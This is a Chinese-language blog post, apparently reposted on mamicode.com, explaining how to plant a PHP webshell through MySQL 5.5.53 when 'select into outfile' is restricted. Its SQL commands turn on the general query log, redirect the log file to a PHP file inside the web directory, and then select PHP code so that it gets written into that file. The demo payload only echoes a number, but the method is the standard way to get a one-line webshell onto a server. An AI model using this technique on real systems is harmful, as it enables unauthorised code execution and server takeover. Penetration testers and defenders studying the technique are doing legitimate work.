码迷,mamicode.com
首页 > 数据库 > 详细

新版mysql写入webshell(测试版本5.5.53)

时间:2017-09-09 23:21:21      阅读:671      评论:0      收藏:0      [点我收藏+]

标签:修改   执行   echo   tutorial   log文件   pre   div   过程   配置   

0x01    前言

新版本的mysql在my.ini中设置了导出文件的路径,无法再使用select into outfile来写入一句话

技术分享

此时在mysql文件夹下的my.ini中可以设置到处路径

技术分享

但是在拿shell时,不可能去修改配置文件

可以通过修改mysql的log文件来获取webshell

0x02    过程

首先进入SQL环境,执行以下SQL语句:

show variables like "%general%";

技术分享

修改如上两个地方的值,其中修改log的地址为网站目录下的php文件,其后log文件会写入其中,修改方法

set global general_log = on;
set global general_log_file = "C:/phpStudy/PHPTutorial/MySQL/6.php";

 

 然后执行

select "<?php echo 12344;?>"

此时在网站目录下6.PHP中就生成了一句话

技术分享

技术分享

成功执行。

 

新版mysql写入webshell(测试版本5.5.53)

标签:修改   执行   echo   tutorial   log文件   pre   div   过程   配置   

原文地址:http://www.cnblogs.com/penguinCold/p/7499605.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!